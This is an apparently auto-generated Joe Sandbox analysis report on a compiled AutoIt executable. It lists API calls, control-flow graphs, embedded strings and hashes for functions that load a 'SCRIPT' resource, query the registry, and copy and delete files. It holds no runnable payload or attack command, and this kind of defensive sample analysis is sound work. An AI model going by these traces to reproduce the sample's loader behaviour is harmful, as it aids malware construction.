                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: This is a third-party compiled AutoIt script.$runas$%=
                                              • API String ID: 529118366-4029254884
                                              • Opcode ID: 1fc482806fd91a37aa6a1a33f365638abde5a00cc55df753e57d8058212cf12d
                                              • Instruction ID: 1700416a66f215588f0b7e083e26f259becec2961cf7c73281ef6e0e1a225c1d
                                              • Opcode Fuzzy Hash: 1fc482806fd91a37aa6a1a33f365638abde5a00cc55df753e57d8058212cf12d
                                              • Instruction Fuzzy Hash: 5351AE31908148AEDB13ABB49C45EEE7BB9EF45700F0080B9E451BF1A2DB746A06CF25

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 983 3449a0-344a00 call 347667 GetVersionExW call 347bcc 988 344a06 983->988 989 344b0b-344b0d 983->989 991 344a09-344a0e 988->991 990 37d767-37d773 989->990 992 37d774-37d778 990->992 993 344a14 991->993 994 344b12-344b13 991->994 996 37d77b-37d787 992->996 997 37d77a 992->997 995 344a15-344a4c call 347d2c call 347726 993->995 994->995 1005 37d864-37d867 995->1005 1006 344a52-344a53 995->1006 996->992 999 37d789-37d78e 996->999 997->996 999->991 1001 37d794-37d79b 999->1001 1001->990 1003 37d79d 1001->1003 1007 37d7a2-37d7a5 1003->1007 1008 37d880-37d884 1005->1008 1009 37d869 1005->1009 1006->1007 1010 344a59-344a64 1006->1010 1011 344a93-344aaa GetCurrentProcess IsWow64Process 1007->1011 1012 37d7ab-37d7c9 1007->1012 1017 37d886-37d88f 1008->1017 1018 37d86f-37d878 1008->1018 1013 37d86c 1009->1013 1014 37d7ea-37d7f0 1010->1014 1015 344a6a-344a6c 1010->1015 1019 344aac 1011->1019 1020 344aaf-344ac0 1011->1020 1012->1011 1016 37d7cf-37d7d5 1012->1016 1013->1018 1025 37d7f2-37d7f5 1014->1025 1026 37d7fa-37d800 1014->1026 1021 37d805-37d811 1015->1021 1022 344a72-344a75 1015->1022 1023 37d7d7-37d7da 1016->1023 1024 37d7df-37d7e5 1016->1024 1017->1013 1027 37d891-37d894 1017->1027 1018->1008 1019->1020 1028 344ac2-344ad2 call 344b37 1020->1028 1029 344b2b-344b35 GetSystemInfo 1020->1029 1033 37d813-37d816 1021->1033 1034 37d81b-37d821 1021->1034 1030 37d831-37d834 1022->1030 1031 344a7b-344a8a 1022->1031 1023->1011 1024->1011 1025->1011 1026->1011 1027->1018 1040 344ad4-344ae1 call 344b37 1028->1040 1041 344b1f-344b29 GetSystemInfo 1028->1041 1032 344af8-344b08 1029->1032 1030->1011 1039 37d83a-37d84f 1030->1039 1036 37d826-37d82c 1031->1036 1037 344a90 1031->1037 1033->1011 1034->1011 1036->1011 1037->1011 1042 37d851-37d854 1039->1042 1043 37d859-37d85f 1039->1043 1048 344ae3-344ae7 GetNativeSystemInfo 1040->1048 1049 344b18-344b1d 1040->1049 1044 344ae9-344aed 1041->1044 1042->1011 1043->1011 1044->1032 1046 344aef-344af2 FreeLibrary 1044->1046 1046->1032 1048->1044 1049->1048
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 003449CD
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              • GetCurrentProcess.KERNEL32(?,003CFAEC,00000000,00000000,?), ref: 00344A9A
                                              • IsWow64Process.KERNEL32(00000000), ref: 00344AA1
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00344AE7
                                              • FreeLibrary.KERNEL32(00000000), ref: 00344AF2
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00344B23
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00344B2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: 5b6dab150a132dcd6c185d0bf0df8a870179ebffcf9c141c51604b872b41e0dd
                                              • Instruction ID: c7623902c5a1b4191a22d773389135e20053e249b5fd4afdabb84cd0e5cf7963
                                              • Opcode Fuzzy Hash: 5b6dab150a132dcd6c185d0bf0df8a870179ebffcf9c141c51604b872b41e0dd
                                              • Instruction Fuzzy Hash: A691B5319897C4DEC733DB6885506AAFFF9AF2A300B484D6DD0CB9BA41D624F508C75A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1080 344e89-344ea1 CreateStreamOnHGlobal 1081 344ec1-344ec6 1080->1081 1082 344ea3-344eba FindResourceExW 1080->1082 1083 37d933-37d942 LoadResource 1082->1083 1084 344ec0 1082->1084 1083->1084 1085 37d948-37d956 SizeofResource 1083->1085 1084->1081 1085->1084 1086 37d95c-37d967 LockResource 1085->1086 1086->1084 1087 37d96d-37d98b 1086->1087 1087->1084
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00344D8E,?,?,00000000,00000000), ref: 00344E99
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00344D8E,?,?,00000000,00000000), ref: 00344EB0
                                              • LoadResource.KERNEL32(?,00000000,?,?,00344D8E,?,?,00000000,00000000,?,?,?,?,?,?,00344E2F), ref: 0037D937
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00344D8E,?,?,00000000,00000000,?,?,?,?,?,?,00344E2F), ref: 0037D94C
                                              • LockResource.KERNEL32(00344D8E,?,?,00344D8E,?,?,00000000,00000000,?,?,?,?,?,?,00344E2F,00000000), ref: 0037D95F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: df428549780473ae5099fb05300430489adda7a9b2b3e73b0600e9adeedf8688
                                              • Instruction ID: b6dd185724a74d3bbf9cb34d5e5d5fcd9e818217cd347a3bd262102aefed2211
                                              • Opcode Fuzzy Hash: df428549780473ae5099fb05300430489adda7a9b2b3e73b0600e9adeedf8688
                                              • Instruction Fuzzy Hash: FE111875240701AFE7228B65EC48F67BBBEEBC5B51F208668F506DA650DB61E8408A60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: pb@$%=
                                              • API String ID: 3964851224-3470441875
                                              • Opcode ID: 61dd28e226887e0687c8c48d29defb67febe1c7b11cbe41293642ba343339db4
                                              • Instruction ID: 481e264dbd5bb8c9089f406caebbd2513f123ee6f24e522e6fac4de3cf6eea90
                                              • Opcode Fuzzy Hash: 61dd28e226887e0687c8c48d29defb67febe1c7b11cbe41293642ba343339db4
                                              • Instruction Fuzzy Hash: 39928A706083418FD726DF24C480B2BB7E5BF85304F15896DE88A9B762D776EC49CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Dd@$Dd@$Dd@$Dd@$Variable must be of type 'Object'.
                                              • API String ID: 0-2845646731
                                              • Opcode ID: 7d7f3b884b36f67610af19c338e4ea15ca08f7e41ac5184a045e7601f851c152
                                              • Instruction ID: 817357476d068a017c31f062f03d4a0e8f7a0827326816ab117606ec38541f37
                                              • Opcode Fuzzy Hash: 7d7f3b884b36f67610af19c338e4ea15ca08f7e41ac5184a045e7601f851c152
                                              • Instruction Fuzzy Hash: E7A26875A00205CFCB26DF58C480AAAB7F6FF59714F268469E806AF351D735BD82CB90
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,0037E398), ref: 003A446A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 003A447B
                                              • FindClose.KERNEL32(00000000), ref: 003A448B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                              • Instruction ID: 85dc5cec80620de1d7cc77f9ebd89936dbc02378f172d079e2a88bc945faba1f
                                              • Opcode Fuzzy Hash: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                              • Instruction Fuzzy Hash: 76E0D8364145006B82116B38EC0D8E9775DDF4A335F100B15F835C10D0E7F4A9009695
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350A5B
                                              • timeGetTime.WINMM ref: 00350D16
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350E53
                                              • Sleep.KERNEL32(0000000A), ref: 00350E61
                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00350EFA
                                              • DestroyWindow.USER32 ref: 00350F06
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00350F20
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00384E83
                                              • TranslateMessage.USER32(?), ref: 00385C60
                                              • DispatchMessageW.USER32(?), ref: 00385C6E
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00385C82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb@$pb@$pb@$pb@
                                              • API String ID: 4212290369-4030950617
                                              • Opcode ID: 42e64bf074522153984b01ac0ac20e0c1fb08efc638870f5dfc87e835d24bb29
                                              • Instruction ID: 215b09dc95ad39c430e1764f603e0ab540e6edb13fdc9092a3eb9bcbef16b15e
                                              • Opcode Fuzzy Hash: 42e64bf074522153984b01ac0ac20e0c1fb08efc638870f5dfc87e835d24bb29
                                              • Instruction Fuzzy Hash: 1FB2D370608741DFD72AEF24C885FAAB7E5FF84304F15495DE8999B2A1CB71E848CB42

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 003A8F5F: __time64.LIBCMT ref: 003A8F69
                                                • Part of subcall function 00344EE5: _fseek.LIBCMT ref: 00344EFD
                                              • __wsplitpath.LIBCMT ref: 003A9234
                                                • Part of subcall function 003640FB: __wsplitpath_helper.LIBCMT ref: 0036413B
                                              • _wcscpy.LIBCMT ref: 003A9247
                                              • _wcscat.LIBCMT ref: 003A925A
                                              • __wsplitpath.LIBCMT ref: 003A927F
                                              • _wcscat.LIBCMT ref: 003A9295
                                              • _wcscat.LIBCMT ref: 003A92A8
                                                • Part of subcall function 003A8FA5: _memmove.LIBCMT ref: 003A8FDE
                                                • Part of subcall function 003A8FA5: _memmove.LIBCMT ref: 003A8FED
                                              • _wcscmp.LIBCMT ref: 003A91EF
                                                • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9824
                                                • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9837
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A9452
                                              • _wcsncpy.LIBCMT ref: 003A94C5
                                              • DeleteFileW.KERNEL32(?,?), ref: 003A94FB
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A9511
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A9522
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A9534
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: f73adc158c7f89b2fec5106460f1d0432188cdbc250221842b1f7028c20fca3a
                                              • Instruction ID: 332622cc6f15c6e1f8b13a0fc5100b6fcddabe610304274c89d22d402cdeb96e
                                              • Opcode Fuzzy Hash: f73adc158c7f89b2fec5106460f1d0432188cdbc250221842b1f7028c20fca3a
                                              • Instruction Fuzzy Hash: 07C12BB1D00219AADF26DF95CC85EDEB7BDEF45310F0044AAF609EA151DB309A448F65

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                              • RegisterClassExW.USER32(00000030), ref: 0034309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                              • LoadIconW.USER32(000000A9), ref: 003430F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: c7dd36887b27c74ec3e857c6aaf86c0cb6a81343a1a50a324a7bcf2f33a83bf6
                                              • Instruction ID: 4902571e3167f6fcd604d00398bfce160ad81ef5215cad01a9b44436e18f14e5
                                              • Opcode Fuzzy Hash: c7dd36887b27c74ec3e857c6aaf86c0cb6a81343a1a50a324a7bcf2f33a83bf6
                                              • Instruction Fuzzy Hash: D13178B2800358AFDB02DFA4D888ADABFF5FB09310F14816EE580EA2A0D3B51554CF91

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                              • RegisterClassExW.USER32(00000030), ref: 0034309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                              • LoadIconW.USER32(000000A9), ref: 003430F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                              • Instruction ID: 6786a2aae98f86858b020351409db048cba1b9126dc7bc679877eb2932daf379
                                              • Opcode Fuzzy Hash: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                              • Instruction Fuzzy Hash: 5A21C7B6901718AFDB01EFA4ED49BDEBBF9FB08700F00812AF911E62A0D7B155548F95

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00344706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004052F8,?,003437AE,?), ref: 00344724
                                                • Part of subcall function 0036050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00347165), ref: 0036052D
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003471A8
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037E8C8
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0037E909
                                              • RegCloseKey.ADVAPI32(?), ref: 0037E947
                                              • _wcscat.LIBCMT ref: 0037E9A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: 2e9beb17cd41f0f6b4bd12bef7560c44954e09658b16d4fbf3d9c54245be6d2e
                                              • Instruction ID: 02b97b8933857fd32f368a91e9c8add5161bda8b36812d97918529badac6c3df
                                              • Opcode Fuzzy Hash: 2e9beb17cd41f0f6b4bd12bef7560c44954e09658b16d4fbf3d9c54245be6d2e
                                              • Instruction Fuzzy Hash: 3071C0724083019EC316EF25ED8199BBBE8FF89310F41457EF446EB1A0DB75A908CB56

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 760 343633-343681 762 3436e1-3436e3 760->762 763 343683-343686 760->763 762->763 766 3436e5 762->766 764 3436e7 763->764 765 343688-34368f 763->765 767 3436ed-3436f0 764->767 768 37d0cc-37d0fa call 351070 call 351093 764->768 769 343695-34369a 765->769 770 34374b-343753 PostQuitMessage 765->770 771 3436ca-3436d2 DefWindowProcW 766->771 772 343715-34373c SetTimer RegisterWindowMessageW 767->772 773 3436f2-3436f3 767->773 807 37d0ff-37d106 768->807 775 37d154-37d168 call 3a2527 769->775 776 3436a0-3436a2 769->776 777 343711-343713 770->777 778 3436d8-3436de 771->778 772->777 782 34373e-343749 CreatePopupMenu 772->782 779 37d06f-37d072 773->779 780 3436f9-34370c KillTimer call 34443a call 343114 773->780 775->777 799 37d16e 775->799 783 343755-34375f call 3444a0 776->783 784 3436a8-3436ad 776->784 777->778 792 37d074-37d076 779->792 793 37d0a8-37d0c7 MoveWindow 779->793 780->777 782->777 800 343764 783->800 788 3436b3-3436b8 784->788 789 37d139-37d140 784->789 797 37d124-37d134 call 3a2d36 788->797 798 3436be-3436c4 788->798 789->771 795 37d146-37d14f call 397c36 789->795 801 37d097-37d0a3 SetFocus 792->801 802 37d078-37d07b 792->802 793->777 795->771 797->777 798->771 798->807 799->771 800->777 801->777 802->798 803 37d081-37d092 call 351070 802->803 803->777 807->771 811 37d10c-37d11f call 34443a call 34434a 807->811 811->771
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 003436D2
                                              • KillTimer.USER32(?,00000001), ref: 003436FC
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0034371F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034372A
                                              • CreatePopupMenu.USER32 ref: 0034373E
                                              • PostQuitMessage.USER32(00000000), ref: 0034374D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated$%=
                                              • API String ID: 129472671-273969447
                                              • Opcode ID: ecc3f3c15ff5335266a93744a00854ec49f4a3716f965089f06b69a6672993c0
                                              • Instruction ID: f6c5e593e313819e72a250edb315795d2069c5473e9cf3fc09c7f922671bddc8
                                              • Opcode Fuzzy Hash: ecc3f3c15ff5335266a93744a00854ec49f4a3716f965089f06b69a6672993c0
                                              • Instruction Fuzzy Hash: 8C412AB2100506ABDF276F24DC49F7A3AD9EB00340F554135F902EF2E2CA78BD109B65

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00343A50
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00343A5F
                                              • LoadIconW.USER32(00000063), ref: 00343A76
                                              • LoadIconW.USER32(000000A4), ref: 00343A88
                                              • LoadIconW.USER32(000000A2), ref: 00343A9A
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AC0
                                              • RegisterClassExW.USER32(?), ref: 00343B16
                                                • Part of subcall function 00343041: GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                • Part of subcall function 00343041: RegisterClassExW.USER32(00000030), ref: 0034309E
                                                • Part of subcall function 00343041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                • Part of subcall function 00343041: InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                • Part of subcall function 00343041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                • Part of subcall function 00343041: LoadIconW.USER32(000000A9), ref: 003430F2
                                                • Part of subcall function 00343041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
